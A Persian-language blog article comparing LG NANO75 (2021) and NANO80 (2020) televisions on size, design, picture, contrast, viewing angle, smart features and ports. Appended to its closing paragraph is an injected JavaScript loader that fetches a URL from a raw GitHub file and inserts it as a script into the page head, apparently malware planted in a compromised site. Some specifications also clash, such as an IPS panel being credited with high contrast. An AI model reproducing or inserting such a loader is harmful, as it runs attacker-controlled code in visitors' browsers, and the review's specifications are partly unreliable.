دسته‌بندی نشده

مقایسه تلویزیون های ال جی NANO75 2021 و NANO80 2020

تلویزیون های سری نانوسل کمپانی ال جی در سال های اخیر تولید و به بازار عرضه شده اند. این تلویزیون ها امروزه محبوبیت فراوانی بین کاربران و افراد پیدا کرده است. سری نانو با فناوری های پیشرفته و کارایی بسیار عالی عرضه شده اند و قدرت بالایی در ارائه محتویات گوناگون دارند. از این سری هر ساله مدل های جدیدی با امکانات پیشرفته تر و قابلیت های متنوع تر به بازار عرضه می شوند. در این مقاله به بررسی تلویزیون ها NANO80 عرضه شده در سال 2020 و NANO75 سال 2021 و نقد و بررسی و مقایسه ان ها با یکدیگر خواهیم پرداخت.

سایز های ارائه شده

تلویزیون ها عموما در سایز و اندازه های مختلفی به بازار عرضه می شوند و هر یک از این اینچ و اندازه ها برای سالن های مختلف بسته به متراژ ان ها کاربرد دارد. تلویزیون های NANO75 و NANO8 ال جی در اینچ های گوناگون بزرگ و کوچک ارائه شده اند و می توانند نیاز بسیاری از کاربران را براورده کنند. تلویزیون ال جی nano75 که مدل جدید ترین نیز می باشد اندازه و اینچ های متنوع تری نسبت به nano80 دارد. این تلویزیون در اندازه های 43، 50، 55، 65، 75، 86 تولید و عرضه شده است و برای سالن های خیلی کوچک و بسیار بزرگ نیز مورد استفاده قرار می گیرد. برای NANO80 تنها 4 سایز 49، 55، 65 و 75 عرضه شده است بنابراین محدوده استفاده کمتری نسبت به نانو 75 خواهد داشت.

دیزاین و طراحی

در هر دو این تلویزیون های ال جی از نمایشگر های تخت استفاده شده است و هیچگونه انحانایی در هیچ یک از ان ها مشاهده نمی شود. NANO80 طراحی ساده در عین حال زیبایی دارد. اگرچه این مدل مانند مدل های دیگر سری نانوسل ( NANO81 ) ظاهری متمایز و خاص ندارد اما با این حال شیک و زیبا به نظر می رسد. حاشه و فریم های باریک و پایه های دو شاخه استفاده شده به جای پایه مرکزی ظاهر تلویزیون را به مدل های جدید تر نزدیک کرده است. برای تلویزیون Nano75 از ظاهری ساده تر استفاده شده است. حاشیه های اطراف این مدل نسبت به نانو 80 تخت تر هستند و همچنین از جنس فلزی برای ان استفاده شده است که یک امتیاز محسوب می شود و ان را خاص تر جلوه می دهد. ظاهر این تلویزیون به مدل های بالا رده مانند ال جی NANO90 نزدیک تر و شبیه تر است اما به جرئت می توان گفت که خاص بودن و امتیازات ظاهری ان را ندارد. برای هر دو این تلویزیون ها از بدنه ظریف و باریک استفاده شده است. Nano80 با وجود ظرافت بالایی که دارد ممکن است هنگام اتصال به دیوار در قسمت پایین مقداری برامدگی داشته باشد . تلویزیون ال جی NANO75 بدنه ظریف و باریک تری دارد و تنها دارای 2.3 اینچ قطر است.

نحوه نمایش محتویات

هر دو این تلویزیون ها محتویات را با کیفیت فورکی 4K و به صورتی عالی نمایش می دهند. NANO80 در محتویات فورکی هیچگونه مشکل و ایرادی ندارد. در این تلویزیون محتویات کیفیت پایین مانند 480p و 720p را خوبی ارتقا می دهد و به صورتی عالی روی نمایشگر ان ها را پخش خواهد کرد. تلویزیون NANO75 ال جی می تواند هر گذینه محتوا فورکی را به شیوه ای بی نظیر با رنگ های طبیعی و جلوه ای فوق العاده پخش کند. محتویاتی مانند 480p و 720p حتی در صورت پخش با استفاده از کابل نیز به خوبی ارتقا پیدا خواهند کرد و با کیفیت بیشتر به نمایش در می ایند.

کنتراست

تلویزیون NANO80 دارای کنتراست بالاتری است که البته با توجه به وجود قابلیت IPS برای پنل ان میزان کنتراست بالا دور از انتظار نخواهد بود. به علت عدم وجود قابلیت local dimming رنگ های مشکی روی این نمایشگر در محیط های تاریک به خاکستری بیشتر نزدیک است. NANO75 متاسفانه در محیط های تاریک در نمایش رنگ های مشکی عملکرد مناسبی ندارد و این رنگ ها را بیشتر شبیه به خاکستری نمایش می دهد. سایز های 50 اینچ و 75 اینچ این مدل دارای پنل VA هستند و در زمینه کنتراست عملکرد بهتری را ارائه می دهند.

زاویه دید گسترده

تلویزیون نانو 80 دارای زاویه دید گسترده ای است. در این تلویزیون از پنل IPS استفاده شده است بنابراین وجود زاویه دید گسترده برای ان امری کاملا طبیعی می باشد. تصاویر و رنگ ها در زوایا مختلف و حتی در قسمت های حاشیه ای به زیبایی قسمت های مرکزی نمایان می شوند. تلویزیون نانو 75 در زمینه زاویه دید عملکردی فوق العاده دارد و از این نظر کاملا بهتر عمل می کند. این تلویزیون را در هر زاویه ای می توان تماشا کرد و رنگ های پر جنب و جوش و تصاویر را در قسمت های مختلف ان به زیبایی و به صورت کاملا یکسان بدون هیچگونه افتی در کیفیت ان ها تماشا کرد. همانطور که انتظار می رود  به دلیل استفاده از پنل VA در سایز های 50 و 70 اینچ زاویه دید ان ها محدود تر می باشد.

بازتاب نور

هر دو این تلویزیون ها از نظر بازتاب نور و انعکاس عملکرد مناسب و شایسته ای دارند البته nano75 در این زمینه تا حدی بهتر عمل می کند. nano80 را می توان به اسانی در اتاق هایی با نور متوسط استفاده کرد و عملکردی مناسب نیز در اینگونه محیط ها ایجاد می کند اما اگر در معرض تابش مستقیم نور قرار گیرد  عملکردی چندان مناسب از ان انتظار نمی رود. NANO75 به دلیل وجود روکش نیمه براق روی ان عملکردی مناسب تر را در هنگام تابش مستقیم نور ایجاد می کند اما در محیط های بسیار روشن نباید انتظار عملکردی عالی و بی نقص را از ان داشت.

قابلیت های اسمارت

برای هر دو این تلویزیون ها از سیستم عامل مخصوص ال جی WebOS استفاده شده است. در تلویزیون Nano80 شاهد محیطی کاملا ساده و کاربردی از این پلتفرم خواهیم بود. تلویزیون Nano75 عملکردی عالی از نظر اسمارت و قابلیت های هوشمند دارد و کاملا مشابه به تلویزیون های رده بالا 2021 ال جی عمل می کند. در این تلویزیون قابلیت های اسمارت مختلف تعبیه شده روی ان به صورت کامل روی صفحه نمایان می شود و دسترسی اسان تر و سریع تری را به کاربران خواهد داد.

ورودی و درگاه های ارتباطی

درگاه های ارتباطی و ورودی های مختلفی که در تلویزیون ها استفاده می شود سطح کارکرد ان را گسترش می دهند و میزان ارتباطات تلویزیون را افزایش خواهند داد. در نانو 80 تعداد 4 درگاه HDMI و دو ورودی USB مشاهده می شود ورودی USB نانو 75 نیز مشابه است و تنها 1 وردی HDMI کمتری دارد. پورت خروجی صدا تعبیه شده برای هر دو تلویزیون ها 1 عدد است اما NANO80 دارای ورودی های کامپونت و کامپوزیت نیز می باشد که هیچ یک از ان ها روی نانو 75 تعبیه نشده است.

سخن اخر

در بین دو تلویزیون NANO75 عرضه شده در سال 2021 و تلویزیون NANO80 سال 2020 تفاوت چندانی مشاهده نمی شود و تنها در برخی موارد مانند ویژگی های ظاهری و امتازات بدست اورده در تلویزیون نانو 75 برتری هایی دیده می شود. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *